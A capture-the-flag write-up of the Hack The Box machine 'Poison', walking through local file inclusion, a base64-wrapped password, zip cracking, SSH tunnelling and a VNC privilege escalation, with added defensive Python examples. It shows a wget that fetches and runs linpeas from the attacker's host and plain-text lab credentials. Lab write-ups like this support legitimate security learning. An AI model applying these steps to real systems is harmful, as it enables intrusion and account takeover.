# Poison

The initial access was incredibly easy, but the privilege escalation required some tools and concepts that I was not well versed in, which made it difficult for me to spot.

## Initial Enumeration

`sudo nmap -sV -sC <IP>`

```
22/tcp open  ssh     OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey: 
|   2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
|   256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_  256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
```

There's a webpage at <http://10.10.10.84/>

<figure><img src="/files/mAMiOwHOJD3lYs1iG7gb" alt=""><figcaption></figcaption></figure>

## LFI Exploit

The scriptname field allows reading local files, which raises LFI suspicions :)

And indeed:

<figure><img src="/files/JaFsgH3PniOgwZkw2jQg" alt=""><figcaption></figcaption></figure>

We got the user charix, and it's FreeBSD.
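For the defender's side of this section, here is an added example (not code from the box or the write-up) of how a `file=` parameter like the one in browse.php should be handled. The webroot and the file names come from the phpinfo output and directory listing later in the write-up; the checking logic is constructed and written in Python rather than the PHP the box actually runs.

```python
import os
from typing import Optional

# Webroot reported by phpinfo on the box (from the write-up). The allowlist
# holds the viewer pages listed in that directory; browse.php itself and
# pwdbackup.txt are deliberately absent. The checking logic is a constructed
# example, not the box's code.
WEBROOT = "/usr/local/www/apache24/data"
ALLOWED_FILES = {"index.php", "info.php", "ini.php", "listfiles.php", "phpinfo.php"}


def contained_path(root: str, requested: str) -> Optional[str]:
    """Resolve `requested` relative to `root` and return the absolute path only
    if it stays inside `root`. NUL bytes and absolute paths are rejected
    outright; '..' segments are neutralised by normalising before the prefix
    check. Note: normpath does not follow symlinks, so on a real filesystem
    run os.path.realpath on both sides before comparing."""
    if not requested or "\x00" in requested or os.path.isabs(requested):
        return None
    root_abs = os.path.normpath(os.path.abspath(root))
    candidate = os.path.normpath(os.path.join(root_abs, requested))
    if candidate == root_abs or not candidate.startswith(root_abs + os.sep):
        return None
    return candidate


def resolve_browse_param(requested: str) -> Optional[str]:
    """The stricter fix: an allowlist of the handful of pages the viewer is
    meant to show, on top of the containment check. Anything else, including
    a backup file that happens to sit in the webroot, is refused."""
    path = contained_path(WEBROOT, requested)
    if path is None or os.path.basename(path) not in ALLOWED_FILES:
        return None
    return path


if __name__ == "__main__":
    for probe in ("listfiles.php", "../../../../etc/passwd", "pwdbackup.txt"):
        print(f"{probe!r:32} -> {resolve_browse_param(probe)}")
```

The containment check alone already stops traversal out of the webroot; the allowlist is what also closes the "interesting file left in the webroot" case that this box turns on.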

## Password Extraction

If you open the PHP files mentioned in the info text one by one, listfiles.php stands out:

<figure><img src="/files/FktbSgbVAgC9z85sRZyV" alt=""><figcaption></figcaption></figure>

Opening the pwdbackup.txt shows something interesting:

<figure><img src="/files/gMVOKH715qEP5Jav9q8L" alt=""><figcaption></figcaption></figure>


Base64-decoding the string 13 times with CyberChef results in this:

```
Charix!2#4%6&8(0
```

<figure><img src="/files/0rCzo9pjY5wM3FbbsEYd" alt=""><figcaption></figcaption></figure>
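The 13 rounds of decoding are easy to script, and the scripted version generalises to any depth: keep decoding until the payload stops being valid base64 (or stops being printable text). This is an added example, not part of the write-up; the sample input is constructed by wrapping the recovered password 13 times, since the contents of pwdbackup.txt are not reproduced here.

```python
import base64
import binascii
from typing import Tuple

# Constructed sample: the password recovered on the box, wrapped in 13 layers
# of base64 the way pwdbackup.txt was. Only the final plaintext comes from the
# write-up; the encoded blob is rebuilt here so the script runs offline.
PLAINTEXT = "Charix!2#4%6&8(0"
LAYERS = 13


def wrap_base64(text: str, layers: int) -> str:
    """Apply base64 `layers` times (used only to build the sample input)."""
    data = text.encode()
    for _ in range(layers):
        data = base64.b64encode(data)
    return data.decode()


SAMPLE = wrap_base64(PLAINTEXT, LAYERS)


def _is_printable_text(data: bytes) -> bool:
    try:
        return data.decode("utf-8").isprintable()
    except UnicodeDecodeError:
        return False


def peel_base64(blob: str, max_layers: int = 64) -> Tuple[str, int]:
    """Strip nested base64 until the payload is no longer valid base64 or is
    no longer printable text. Returns (payload, layers_removed).

    validate=True is what makes the loop stop on the real password: '!', '#'
    and '%' are outside the base64 alphabet, so the decoder raises instead of
    silently skipping them. The printable check catches the other case, a
    plaintext such as "password" that happens to be base64-shaped but whose
    decoding is binary junk.
    """
    current = "".join(blob.split())  # tolerate line-wrapped copies of the blob
    layers = 0
    while layers < max_layers:
        try:
            decoded = base64.b64decode(current, validate=True)
        except (binascii.Error, ValueError):
            break
        if not decoded or not _is_printable_text(decoded):
            break
        current = decoded.decode("utf-8")
        layers += 1
    return current, layers


if __name__ == "__main__":
    payload, depth = peel_base64(SAMPLE)
    print(f"{depth} layers removed -> {payload!r}")
```

Whitespace is stripped before decoding because files like this one are usually line-wrapped; if the final secret itself contained spaces they would be lost, so for an unknown target compare against the last valid layer rather than trusting the stripped copy blindly.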

ssh-ing to the box with `charix:Charix!2#4%6&8(0` worked.

## Internal Enumeration

<figure><img src="/files/Poath4Auc1YhvBcyayWP" alt=""><figcaption></figcaption></figure>

I should exfiltrate the zip file.

Typing `python` and pressing Tab showed that python2 was installed on the host, so I used a Python webserver to exfiltrate the file via wget:

`python -m SimpleHTTPServer 8000`

It is password protected:

<figure><img src="/files/QSkydTajoq79j6Du26Kl" alt=""><figcaption></figcaption></figure>

Using zip2john I could extract the password:

```
[nix@local] $ zip2john /HTBfolder/Boxes/HTB-Poison/secret.zip
ver 2.0 secret.zip/secret PKZIP Encr: cmplen=20, decmplen=8, crc=77537827
secret.zip/secret:$pkzip2$1*1*2*0*14*8*77537827*0*24*0*14*7753*9827*8061b9caf8436874ad47a9481863b54443379d4c*$/pkzip2$:secret:secret.zip::/HTBfolder/Boxes/HTB-Poison/secret.zip
```

Putting the hash in a file and attempting to crack it with john did not work:

`john --wordlist=/usr/share/seclists/Passwords/rockyou.txt hash.tmp`

Wow, okay, the password `Charix!2#4%6&8(0` worked to open the zip.

The content of the secret file is odd (8 bytes of binary, going by the `decmplen=8` in the zip2john output):

`[|Ֆz!`

## Internal Enumeration 2

I established a dynamic reverse proxy connection to the host with ssh:

`ssh -D 9050 charix@10.10.10.84`

This does not seem to work.

<figure><img src="/files/25tDLjN42n8KKG4FfzP1" alt=""><figcaption></figcaption></figure>

`charix@Poison:~ % cat /etc/ssh/sshd_config | grep TcpForwarding`

```
#AllowTcpForwarding yes
# AllowTcpForwarding no
```

TcpForwarding is not explicitly prohibited (both lines are commented out, so sshd uses its default of `yes`), but it might be a firewall issue.

This only shows 22 and 9050, which is odd:

`proxychains ss -tulpn`

(In hindsight this makes sense: proxychains only redirects a command's network connections, it does not run the command on the other end. `ss` still inspects the attacking machine's own sockets, so the list is the local sshd and the SOCKS port, not the box's listeners.)

`uname -a` reveals this: FreeBSD Poison 11.1-RELEASE

A first internet search did not turn up a major vulnerability for that OS version.

`ps -aux | grep root` shows this, which could be interesting:

```
root 529 0.0 0.7 23620 7468 v0- I 17:37 0:00.04 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/
root 540 0.0 0.5 67220 4676 v0- I 17:37 0:00.02 xterm -geometry 80x24+10+10 -ls -title X Desktop
root 703 0.0 0.2 10484 1608 v7 Is+ 17:39 0:00.00 /usr/libexec/getty Pc ttyv7
root 564 0.0 0.3 19660 2868 0 Is+ 17:37 0:00.01 -csh (csh)
```

I hosted linpeas on my machine, then fetched and ran it like this:

```
charix@Poison:~ % wget http://10.10.16.6:8000/linpeas.sh
charix@Poison:~ % chmod +x linpeas.sh
charix@Poison:~ % ./linpeas.sh
╔══════════╣ Unix Sockets Listening
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
sed: first RE may not be empty
/tmp/.X11-unix/X1
└─(Read Write)
/var/run/devd.pipe
└─(Read Write)
/var/run/devd.seqpacket.pipe
└─(Read Write)
/var/run/log
└─(Read Write)
-r-sr-xr-x 1 root wheel 2.1M Jan 2 2018 /usr/local/bin/Xorg (Unknown SUID binary!)
╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path
/usr/bin/lesspipe.sh
/usr/local/bin/gettext.sh
<SNIP>
```

I also ran LinEnum, but it did not show more than linpeas.

**Webserver deeper enum:**

Since I could not find anything interesting locally, I went back to the webserver and checked the phpinfo file, in case it runs as root or something along those lines.

<http://10.10.10.84/browse.php?file=phpinfo.php>

```
webroot: /usr/local/www/apache24/data
charix@Poison:/usr/local/www/apache24/data % ls
browse.php index.php info.php ini.php listfiles.php phpinfo.php pwdbackup.txt
```

I could not identify any obvious vulnerability in the php configuration.

One instance of httpd seems to run as root (`ps -aux`). That is the Apache parent process, which normally starts as root and then spawns the `www` worker processes that actually serve requests:

```
root 632 0.0 1.1 99172 11516 - Ss 17:50 0:00.06 /usr/local/sbin/httpd -DNOHTTPACCEPT
```

I read that the initial access is usually meant to be log poisoning: you get the www-data user by poisoning the Apache log with a PHP-executable User-Agent and then including the log through the LFI. From what I saw, this was not necessary. Since I made no progress here, I peeked at a walkthrough to get a hint. The hint was that the VNC session I saw earlier could be connected to with a VNC viewer. So I was on the right track with the X session I found, and the port forwarding I did was a good idea too. I just have to connect to the session somehow.

Starting RealVNC Viewer with proxychains and calling 127.0.0.1 did not work.

I googled how to find listening ports on BSD:

<https://www.cyberciti.biz/faq/freebsd-unix-find-the-process-pid-listening-on-a-certain-port-commands/>

`sockstat -l`

```
USER  COMMAND  PID  FD PROTO  LOCAL ADDRESS                FOREIGN ADDRESS
www   httpd    1144 3  tcp6   *:80                         *:*
www   httpd    1144 4  tcp4   *:80                         *:*
root  sendmail 650  3  tcp4   127.0.0.1:25                 *:*
www   httpd    648  3  tcp6   *:80                         *:*
www   httpd    648  4  tcp4   *:80                         *:*
www   httpd    647  3  tcp6   *:80                         *:*
www   httpd    647  4  tcp4   *:80                         *:*
www   httpd    646  3  tcp6   *:80                         *:*
www   httpd    646  4  tcp4   *:80                         *:*
www   httpd    645  3  tcp6   *:80                         *:*
www   httpd    645  4  tcp4   *:80                         *:*
www   httpd    644  3  tcp6   *:80                         *:*
www   httpd    644  4  tcp4   *:80                         *:*
root  httpd    632  3  tcp6   *:80                         *:*
root  httpd    632  4  tcp4   *:80                         *:*
root  sshd     620  3  tcp6   *:22                         *:*
root  sshd     620  4  tcp4   *:22                         *:*
root  Xvnc     529  0  stream /tmp/.X11-unix/X1
root  Xvnc     529  1  tcp4   127.0.0.1:5901               *:*
root  Xvnc     529  3  tcp4   127.0.0.1:5801               *:*
root  syslogd  390  4  dgram  /var/run/log
root  syslogd  390  5  dgram  /var/run/logpriv
root  syslogd  390  6  udp6   *:514                        *:*
root  syslogd  390  7  udp4   *:514                        *:*
root  devd     319  4  stream /var/run/devd.pipe
root  devd     319  5  seqpac /var/run/devd.seqpacket.pipe
```
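The useful pattern in that listing is the split between what is bound to a wildcard address (visible to the initial nmap scan) and what is bound to 127.0.0.1 only (the Xvnc ports and sendmail, reachable only from the host or over a tunnel). Below is an added example, not part of the write-up, that parses the `sockstat -l` output shown above and pulls out exactly those two groups, the way an audit script would; the sample input is the listing from this page and the function names are my own.

```python
from dataclasses import dataclass
from typing import List, Optional, Set, Tuple

# Sample input: the `sockstat -l` output captured on the box, copied from the
# write-up above (header line included).
SOCKSTAT_OUTPUT = """\
USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS
www httpd 1144 3 tcp6 *:80 *:*
www httpd 1144 4 tcp4 *:80 *:*
root sendmail 650 3 tcp4 127.0.0.1:25 *:*
www httpd 648 3 tcp6 *:80 *:*
www httpd 648 4 tcp4 *:80 *:*
www httpd 647 3 tcp6 *:80 *:*
www httpd 647 4 tcp4 *:80 *:*
www httpd 646 3 tcp6 *:80 *:*
www httpd 646 4 tcp4 *:80 *:*
www httpd 645 3 tcp6 *:80 *:*
www httpd 645 4 tcp4 *:80 *:*
www httpd 644 3 tcp6 *:80 *:*
www httpd 644 4 tcp4 *:80 *:*
root httpd 632 3 tcp6 *:80 *:*
root httpd 632 4 tcp4 *:80 *:*
root sshd 620 3 tcp6 *:22 *:*
root sshd 620 4 tcp4 *:22 *:*
root Xvnc 529 0 stream /tmp/.X11-unix/X1
root Xvnc 529 1 tcp4 127.0.0.1:5901 *:*
root Xvnc 529 3 tcp4 127.0.0.1:5801 *:*
root syslogd 390 4 dgram /var/run/log
root syslogd 390 5 dgram /var/run/logpriv
root syslogd 390 6 udp6 *:514 *:*
root syslogd 390 7 udp4 *:514 *:*
root devd 319 4 stream /var/run/devd.pipe
root devd 319 5 seqpac /var/run/devd.seqpacket.pipe
"""


@dataclass(frozen=True)
class Listener:
    user: str
    command: str
    pid: int
    fd: int
    proto: str
    local: str
    foreign: Optional[str]  # absent for unix-domain sockets

    @property
    def is_inet(self) -> bool:
        return self.proto.startswith(("tcp", "udp"))

    @property
    def port(self) -> Optional[int]:
        if not self.is_inet:
            return None
        return int(self.local.rsplit(":", 1)[1])

    @property
    def loopback_only(self) -> bool:
        return self.is_inet and self.local.startswith(("127.", "::1:"))


def parse_sockstat(text: str) -> List[Listener]:
    """Parse `sockstat -l` rows. The header spells 'LOCAL ADDRESS' as two
    words, so rows are split on whitespace rather than by header offsets;
    unix-domain rows simply have no foreign-address column."""
    rows = []
    for line in text.splitlines()[1:]:
        parts = line.split()
        if len(parts) < 6:
            continue
        user, command, pid, fd, proto, local = parts[:6]
        foreign = parts[6] if len(parts) > 6 else None
        rows.append(Listener(user, command, int(pid), int(fd), proto, local, foreign))
    return rows


def loopback_services(listeners: List[Listener]) -> Set[Tuple[str, int]]:
    """Services bound to loopback only: absent from an external port scan,
    reachable from the host itself or through an SSH tunnel (-D/-L)."""
    return {(l.command, l.port) for l in listeners if l.loopback_only}


def root_exposed_services(listeners: List[Listener]) -> Set[Tuple[str, int]]:
    """Root-owned listeners on a wildcard address: the first things to review
    in a hardening pass, since any flaw there lands directly as root."""
    return {(l.command, l.port) for l in listeners
            if l.user == "root" and l.is_inet and l.local.startswith("*:")}


if __name__ == "__main__":
    found = parse_sockstat(SOCKSTAT_OUTPUT)
    print("loopback only :", sorted(loopback_services(found)))
    print("root, exposed :", sorted(root_exposed_services(found)))
```

The tcp4/tcp6 pairs collapse into one entry per (command, port) because the result is a set; keep the full `Listener` rows if you also want the PID or the file descriptor.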

Okay, I will try connecting again, using the ports 5901 and 5801.

It works, but it asks for a password. The strings I collected so far did not work.

<figure><img src="/files/cEQ80Ng1mmm0mP7e4mh9" alt=""><figcaption></figcaption></figure>

The string from the file looks very weird and didn't work when typed in. I downloaded TigerVNC, whose vncviewer is a CLI VNC viewer that can take the password from a file instead:

`proxychains vncviewer passwd=/HTBfolder/Boxes/HTB-Poison/secret 127.0.0.1:5901`

This worked to connect to the VNC session!

<figure><img src="/files/Bc5i1CWlhMRs6eQ3mmFQ" alt=""><figcaption></figcaption></figure>
